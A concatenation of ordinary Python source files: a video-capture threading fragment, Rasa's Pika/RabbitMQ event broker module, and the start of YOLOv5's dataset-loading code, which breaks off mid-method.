def frame_and_cut(self) -> Tuple[ndarray, ndarray] or None:
"""
Pops (frame, cut) from a deque if there are more than one tuple inside.
Returns
-------
(frame, cut) or None
"""
if len(self.edited_frames) > 1:
frame, cut = self.edited_frames.pop()
return frame, cut
else:
return None
def worker_capturer(capture, period: float, model: Model):
"""
Worker function for another thread that captures frames
and puts them to deque with constant period given.
Parameters
----------
capture : cv2.VideoCapture()
period : (in seconds)
model
"""
while model.capturing:
ret, frame = capture.read()
if frame is not None:
model.captured_frames.appendleft(frame)
sleep(period)
def worker_editor(period: float, model: Model):
"""
Worker function for another thread that edits frames and puts them
to deque. Edits the latest frame and takes a cut along X axis from it
(fixed Y coordinate).
Parameters
----------
period : (in seconds)
model
"""
while model.capturing:
frame = None
while len(model.captured_frames) > 1:
frame = model.captured_frames.pop()
if not (frame is None):
frame, cut = edit_frame(frame, model.y)
model.edited_frames.appendleft((frame, cut))
deferred_call(model.update)
else:
sleep(period)
|
pika.py
|
import json
import logging
import os
import time
import typing
from collections import deque
from threading import Thread
from typing import Callable, Deque, Dict, Optional, Text, Union, Any, List, Tuple
from rasa.constants import (
DEFAULT_LOG_LEVEL_LIBRARIES,
ENV_LOG_LEVEL_LIBRARIES,
DOCS_URL_PIKA_EVENT_BROKER,
)
from rasa.core.brokers.broker import EventBroker
from rasa.utils.common import raise_warning
from rasa.utils.endpoints import EndpointConfig
from rasa.utils.io import DEFAULT_ENCODING
if typing.TYPE_CHECKING:
from pika.adapters.blocking_connection import BlockingChannel
from pika import SelectConnection, BlockingConnection, BasicProperties
from pika.channel import Channel
import pika
from pika.connection import Parameters, Connection
logger = logging.getLogger(__name__)
RABBITMQ_EXCHANGE = "rasa-exchange"
def initialise_pika_connection(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: float = 5,
) -> "BlockingConnection":
"""Create a Pika `BlockingConnection`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
`pika.BlockingConnection` with provided parameters
"""
import pika
parameters = _get_pika_parameters(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return pika.BlockingConnection(parameters)
def _get_pika_parameters(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: float = 5,
) -> "Parameters":
"""Create Pika `Parameters`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
`pika.ConnectionParameters` which can be used to create a new connection to a
broker.
"""
import pika
if host.startswith("amqp"):
# user supplied a amqp url containing all the info
parameters = pika.URLParameters(host)
parameters.connection_attempts = connection_attempts
parameters.retry_delay = retry_delay_in_seconds
if username:
parameters.credentials = pika.PlainCredentials(username, password)
else:
# host seems to be just the host, so we use our parameters
parameters = pika.ConnectionParameters(
host,
port=port,
credentials=pika.PlainCredentials(username, password),
connection_attempts=connection_attempts,
# Wait between retries since
# it can take some time until
# RabbitMQ comes up.
retry_delay=retry_delay_in_seconds,
ssl_options=create_rabbitmq_ssl_options(host),
)
return parameters
def initialise_pika_select_connection(
parameters: "Parameters",
on_open_callback: Callable[["SelectConnection"], None],
on_open_error_callback: Callable[["SelectConnection", Text], None],
) -> "SelectConnection":
"""Create a non-blocking Pika `SelectConnection`.
Args:
parameters: Parameters which should be used to connect.
on_open_callback: Callback which is called when the connection was established.
on_open_error_callback: Callback which is called when connecting to the broker
failed.
Returns:
A callback-based connection to the RabbitMQ event broker.
"""
import pika
return pika.SelectConnection(
parameters,
on_open_callback=on_open_callback,
on_open_error_callback=on_open_error_callback,
)
def initialise_pika_channel(
host: Text,
queue: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: float = 5,
) -> "BlockingChannel":
"""Initialise a Pika channel with a durable queue.
Args:
host: Pika host.
queue: Pika queue to declare.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
connection_attempts: Number of channel attempts before giving up.
retry_delay_in_seconds: Delay in seconds between channel attempts.
Returns:
Pika `BlockingChannel` with declared queue.
"""
connection = initialise_pika_connection(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return _declare_pika_channel_with_queue(connection, queue)
def _declare_pika_channel_with_queue(
connection: "BlockingConnection", queue: Text
) -> "BlockingChannel":
"""Declare a durable queue on Pika channel."""
channel = connection.channel()
channel.queue_declare(queue, durable=True)
return channel
def close_pika_channel(
channel: "Channel",
attempts: int = 1000,
time_between_attempts_in_seconds: float = 0.001,
) -> None:
"""Attempt to close Pika channel and wait until it is closed.
Args:
channel: Pika `Channel` to close.
attempts: How many times to try to confirm that the channel has indeed been
closed.
time_between_attempts_in_seconds: Wait time between attempts to confirm closed
state.
"""
from pika.exceptions import AMQPError
try:
channel.close()
logger.debug("Successfully initiated closing of Pika channel.")
except AMQPError:
logger.exception("Failed to initiate closing of Pika channel.")
while attempts:
if channel.is_closed:
logger.debug("Successfully closed Pika channel.")
return None
time.sleep(time_between_attempts_in_seconds)
attempts -= 1
logger.exception("Failed to close Pika channel.")
def close_pika_connection(connection: "Connection") -> None:
"""Attempt to close Pika connection."""
from pika.exceptions import AMQPError
try:
connection.close()
logger.debug("Successfully closed Pika connection with host.")
except AMQPError:
logger.exception("Failed to close Pika connection with host.")
class PikaEventBroker(EventBroker):
"""Pika-based event broker for publishing messages to RabbitMQ."""
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queues: Union[List[Text], Tuple[Text], Text, None] = ("rasa_core_events",),
should_keep_unpublished_messages: bool = True,
raise_on_failure: bool = False,
log_level: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
**kwargs: Any,
):
"""Initialise RabbitMQ event broker.
Args:
host: Pika host.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
queues: Pika queues to declare and publish to.
should_keep_unpublished_messages: Whether or not the event broker should
maintain a queue of unpublished messages to be published later in
case of errors.
raise_on_failure: Whether to raise an exception if publishing fails. If
`False`, keep retrying.
log_level: Logging level.
"""
logging.getLogger("pika").setLevel(log_level)
self.host = host
self.username = username
self.password = password
self.port = port
self.channel: Optional["Channel"] = None
self.queues = self._get_queues_from_args(queues, kwargs)
self.should_keep_unpublished_messages = should_keep_unpublished_messages
self.raise_on_failure = raise_on_failure
# List to store unpublished messages which hopefully will be published later
self._unpublished_messages: Deque[Text] = deque()
self._run_pika()
def __del__(self) -> None:
if self.channel:
close_pika_channel(self.channel)
close_pika_connection(self.channel.connection)
def close(self) -> None:
"""Close the pika channel and connection."""
self.__del__()
@property
def rasa_environment(self) -> Optional[Text]:
"""Get value of the `RASA_ENVIRONMENT` environment variable."""
return os.environ.get("RASA_ENVIRONMENT")
@staticmethod
def _get_queues_from_args(
queues_arg: Union[List[Text], Tuple[Text], Text, None], kwargs: Any,
) -> Union[List[Text], Tuple[Text]]:
"""Get queues for this event broker.
The preferred argument defining the RabbitMQ queues the `PikaEventBroker` should
publish to is `queues` (as of Rasa Open Source version 1.8.2). This function
ensures backwards compatibility with the old `queue` argument. This method
can be removed in the future, and `self.queues` should just receive the value of
the `queues` kwarg in the constructor.
Args:
queues_arg: Value of the supplied `queues` argument.
kwargs: Additional kwargs supplied to the `PikaEventBroker` constructor.
If `queues_arg` is not supplied, the `queue` kwarg will be used instead.
Returns:
Queues this event broker publishes to.
Raises:
`ValueError` if no valid `queue` or `queues` argument was found.
"""
queue_arg = kwargs.pop("queue", None)
if queue_arg:
raise_warning(
"Your Pika event broker config contains the deprecated `queue` key. "
"Please use the `queues` key instead.",
FutureWarning,
docs=DOCS_URL_PIKA_EVENT_BROKER,
)
if queues_arg and isinstance(queues_arg, (list, tuple)):
return queues_arg
if queues_arg and isinstance(queues_arg, str):
logger.debug(
f"Found a string value under the `queues` key of the Pika event broker "
f"config. Please supply a list of queues under this key, even if it is "
f"just a single one. See {DOCS_URL_PIKA_EVENT_BROKER}"
)
return [queues_arg]
if queue_arg and isinstance(queue_arg, str):
return [queue_arg]
if queue_arg:
return queue_arg # pytype: disable=bad-return-type
raise ValueError(
f"Could not initialise `PikaEventBroker` due to invalid "
f"`queues` or `queue` argument in constructor. See "
f"{DOCS_URL_PIKA_EVENT_BROKER}."
)
@classmethod
def from_endpoint_config(
cls, broker_config: Optional["EndpointConfig"]
) -> Optional["PikaEventBroker"]:
"""Initialise `PikaEventBroker` from `EndpointConfig`.
Args:
broker_config: `EndpointConfig` to read.
Returns:
`PikaEventBroker` if `broker_config` was supplied, else `None`.
"""
if broker_config is None:
return None
return cls(broker_config.url, **broker_config.kwargs)
def _run_pika(self) -> None:
parameters = _get_pika_parameters(
self.host, self.username, self.password, self.port
)
self._pika_connection = initialise_pika_select_connection(
parameters, self._on_open_connection, self._on_open_connection_error
)
# Run Pika io loop in extra thread so it's not blocking
self._run_pika_io_loop_in_thread()
def _on_open_connection(self, connection: "SelectConnection") -> None:
logger.debug(f"RabbitMQ connection to '{self.host}' was established.")
connection.channel(on_open_callback=self._on_channel_open)
def _on_open_connection_error(self, _, error: Text) -> None:
logger.warning(
f"Connecting to '{self.host}' failed with error '{error}'. Trying again."
)
def _on_channel_open(self, channel: "Channel") -> None:
logger.debug("RabbitMQ channel was opened. Declaring fanout exchange.")
# declare exchange of type 'fanout' in order to publish to multiple queues
# (https://www.rabbitmq.com/tutorials/amqp-concepts.html#exchange-fanout)
channel.exchange_declare(RABBITMQ_EXCHANGE, exchange_type="fanout")
for queue in self.queues:
channel.queue_declare(queue=queue, durable=True)
channel.queue_bind(exchange=RABBITMQ_EXCHANGE, queue=queue)
self.channel = channel
while self._unpublished_messages:
# Send unpublished messages
message = self._unpublished_messages.popleft()
self._publish(message)
logger.debug(
f"Published message from queue of unpublished messages. "
f"Remaining unpublished messages: {len(self._unpublished_messages)}."
)
def _run_pika_io_loop_in_thread(self) -> None:
thread = Thread(target=self._run_pika_io_loop, daemon=True)
thread.start()
def _run_pika_io_loop(self) -> None:
# noinspection PyUnresolvedReferences
self._pika_connection.ioloop.start()
def is_ready(
self, attempts: int = 1000, wait_time_between_attempts_in_seconds: float = 0.01,
) -> bool:
"""Spin until the pika channel is open.
It typically takes 50 ms or so for the pika channel to open. We'll wait up
to 10 seconds just in case.
Args:
attempts: Number of retries.
wait_time_between_attempts_in_seconds: Wait time between retries.
Returns:
`True` if the channel is available, `False` otherwise.
"""
while attempts:
if self.channel:
return True
time.sleep(wait_time_between_attempts_in_seconds)
attempts -= 1
return False
def publish(
self,
event: Dict[Text, Any],
retries: int = 60,
retry_delay_in_seconds: int = 5,
headers: Optional[Dict[Text, Text]] = None,
) -> None:
"""Publish `event` into Pika queue.
Args:
event: Serialised event to be published.
retries: Number of retries if publishing fails
retry_delay_in_seconds: Delay in seconds between retries.
headers: Message headers to append to the published message (key-value
dictionary). The headers can be retrieved in the consumer from the
`headers` attribute of the message's `BasicProperties`.
"""
body = json.dumps(event)
while retries:
try:
self._publish(body, headers)
return
except Exception as e:
logger.error(
f"Could not open Pika channel at host '{self.host}'. "
f"Failed with error: {e}"
)
self.channel = None
if self.raise_on_failure:
raise e
retries -= 1
time.sleep(retry_delay_in_seconds)
logger.error(f"Failed to publish Pika event on host '{self.host}':\n{body}")
def _get_message_properties(
self, headers: Optional[Dict[Text, Text]] = None
) -> "BasicProperties":
"""Create RabbitMQ message `BasicProperties`.
The `app_id` property is set to the value of `self.rasa_environment` if
present, and the message delivery mode is set to 2 (persistent). In
addition, the `headers` property is set if supplied.
Args:
headers: Message headers to add to the message properties of the
published message (key-value dictionary). The headers can be retrieved in
the consumer from the `headers` attribute of the message's
`BasicProperties`.
Returns:
`pika.spec.BasicProperties` with the `RASA_ENVIRONMENT` environment variable
as the properties' `app_id` value, `delivery_mode`=2 and `headers` as the
properties' headers.
"""
from pika.spec import BasicProperties
# make message persistent
kwargs = {"delivery_mode": 2}
if self.rasa_environment:
kwargs["app_id"] = self.rasa_environment
if headers:
kwargs["headers"] = headers
return BasicProperties(**kwargs)
def _basic_publish(
self, body: Text, headers: Optional[Dict[Text, Text]] = None
) -> None:
self.channel.basic_publish(
exchange=RABBITMQ_EXCHANGE,
routing_key="",
body=body.encode(DEFAULT_ENCODING),
properties=self._get_message_properties(headers),
)
logger.debug(
f"Published Pika events to exchange '{RABBITMQ_EXCHANGE}' on host "
f"'{self.host}':\n{body}"
)
def _publish(self, body: Text, headers: Optional[Dict[Text, Text]] = None) -> None:
if self._pika_connection.is_closed:
# Try to reset connection
self._run_pika()
self._basic_publish(body, headers)
elif not self.channel and self.should_keep_unpublished_messages:
logger.warning(
f"RabbitMQ channel has not been assigned. Adding message to "
f"list of unpublished messages and trying to publish them "
f"later. Current number of unpublished messages is "
f"{len(self._unpublished_messages)}."
)
self._unpublished_messages.append(body)
else:
self._basic_publish(body, headers)
def create_rabbitmq_ssl_options(
rabbitmq_host: Optional[Text] = None,
) -> Optional["pika.SSLOptions"]:
"""Create RabbitMQ SSL options.
Requires the following environment variables to be set:
RABBITMQ_SSL_CLIENT_CERTIFICATE - path to the SSL client certificate (required)
RABBITMQ_SSL_CLIENT_KEY - path to the SSL client key (required)
RABBITMQ_SSL_CA_FILE - path to the SSL CA file for verification (optional)
RABBITMQ_SSL_KEY_PASSWORD - SSL private key password (optional)
Details on how to enable RabbitMQ TLS support can be found here:
https://www.rabbitmq.com/ssl.html#enabling-tls
Args:
rabbitmq_host: RabbitMQ hostname
Returns:
Pika SSL context of type `pika.SSLOptions` if
the RABBITMQ_SSL_CLIENT_CERTIFICATE and RABBITMQ_SSL_CLIENT_KEY
environment variables are valid paths, else `None`.
"""
client_certificate_path = os.environ.get("RABBITMQ_SSL_CLIENT_CERTIFICATE")
client_key_path = os.environ.get("RABBITMQ_SSL_CLIENT_KEY")
if client_certificate_path and client_key_path:
import pika
import rasa.server
logger.debug(f"Configuring SSL context for RabbitMQ host '{rabbitmq_host}'.")
ca_file_path = os.environ.get("RABBITMQ_SSL_CA_FILE")
key_password = os.environ.get("RABBITMQ_SSL_KEY_PASSWORD")
ssl_context = rasa.server.create_ssl_context(
client_certificate_path, client_key_path, ca_file_path, key_password
)
return pika.SSLOptions(ssl_context, rabbitmq_host)
else:
return None
class PikaProducer(PikaEventBroker):
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queues: Union[List[Text], Tuple[Text], Text, None] = ("rasa_core_events",),
should_keep_unpublished_messages: bool = True,
raise_on_failure: bool = False,
log_level: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
**kwargs: Any,
):
raise_warning(
"The `PikaProducer` class is deprecated, please inherit "
"from `PikaEventBroker` instead. `PikaProducer` will be "
"removed in future Rasa versions.",
FutureWarning,
docs=DOCS_URL_PIKA_EVENT_BROKER,
)
super(PikaProducer, self).__init__(
host,
username,
password,
port,
queues,
should_keep_unpublished_messages,
raise_on_failure,
log_level,
**kwargs,
)
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
local_rank=-1, world_size=1):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(local_rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, 8]) # number of workers
train_sampler = torch.utils.data.distributed.DistributedSampler(dataset) if local_rank != -1 else None
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=train_sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
# 원래 코드에서 한국어 경로 가능하게 변경
stream = open(path.encode("utf-8"), "rb")
bytes = bytearray(stream.read())
numpyArray = np.asarray(bytes, dtype=np.uint8)
img0 = cv2.imdecode(numpyArray , cv2.IMREAD_UNCHANGED)
# img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:[email protected]/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:[email protected]/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:[email protected]:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
